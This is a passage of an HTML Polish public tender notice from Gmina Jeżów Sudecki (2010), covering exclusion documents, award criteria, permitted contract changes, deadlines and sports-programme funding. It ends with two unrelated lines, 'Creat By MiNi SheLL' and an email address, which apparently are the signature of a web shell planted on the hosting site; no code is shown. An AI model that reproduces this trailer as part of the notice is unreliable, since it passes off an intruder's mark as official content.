<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający  przewiduje możliwość zmiany zawartej  umowy w przypadku :

a) zmiany kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu 
    zamówienia na osobę (y) spełniającą (e) co najmniej warunki podmiotowe określone w Cz.I. IDW,
    zmiana lub konieczność  dodatkowego wprowadzenia na plac budowy - podwykonawcy

b) rezygnacji z wykonania pełnego zakresu rzeczowego objętego zamówieniem w przypadku zaistnienia  okoliczności, w których zbędne będzie wykonanie danej części zamówienia , wraz     
     z jednoczesnym związanym z tym obniżeniem wynagrodzenia, w oparciu o dostarczony kosztorys ofertowy  przed podpisaniem umowy,   

c) wprowadzenia robót zamiennych podczas realizacji umowy wynikających z rzeczywistych warunków występujących w trakcie realizacji prac - nie powodujących zmian  w wysokości ceny umownej  wpisanej do umowy,

  
d)  wystąpienia wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających   
wykonanie robót zgodnie z zasadami wiedzy technicznej, obowiązującymi przepisami                        i warunkami technologicznymi określonymi dla robót, które miałyby być wykonane w tych warunkach;  konieczność zrealizowania zamówienia przy zastosowaniu innych rozwiązań 
technicznych, technologicznych lub materiałowych niż wskazane w Dokumentacji projektowej      w sytuacji, gdyby zastosowanie dotychczasowych rozwiązań groziło nie wykonaniem lub wadliwym  wykonaniem projektu - dotyczy  możliwości  wydłużenia terminu realizacji zakończenia i/lub zmiany wynagrodzenia na zasadach określonych w punktach b), c) lud d).


2. Zmiany umowy nie wymaga: zmiana danych teleadresowych, zmiana osób wskazanych do   kontaktów między stronami umowy, zmiana danych związanych z obsługą administracyjno-organizacyjną umowy  (np. zmiana rachunku bankowego). 

3. O interpretacji zdarzenia _siły wyższej_ i ewentualnym uznaniu przedłużenia terminu wykonania robót  z tego powodu, będzie decydował Wójt Gminy Jeżów Sudecki , w trakcie realizacji robót, po złożeniu pisemnego wniosku Wykonawcy .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jezowsudecki.pl ; link_BIP; zakładka_przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ze strony internetowej Gminy, w wersji papierowej w ciagu 5 dni od daty złożenia wniosku do Zamawiajacego z dowodem wniesienia opłaty w kwocie 250 zł za wykonanie kserokopii  dokumentacji  projektowej.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.09.2010 godzina 12:00, miejsce: Urząd  Gminy Jeżów Sudecki , 58-521 Jeżów Sudecki , ul. Długa 63  lub bezpośrednio do sekretariatu Urzędu Gminy -  I piętro ( adres  j. w.),.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  realizowany  jest  w ramach Programu Rozwoju Bazy Sportowej Województwa Dolnośląskiego    w latach 2010-2012 , z dofinansowaniem środkami  Funduszu Rozwoju Kultury Fizycznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com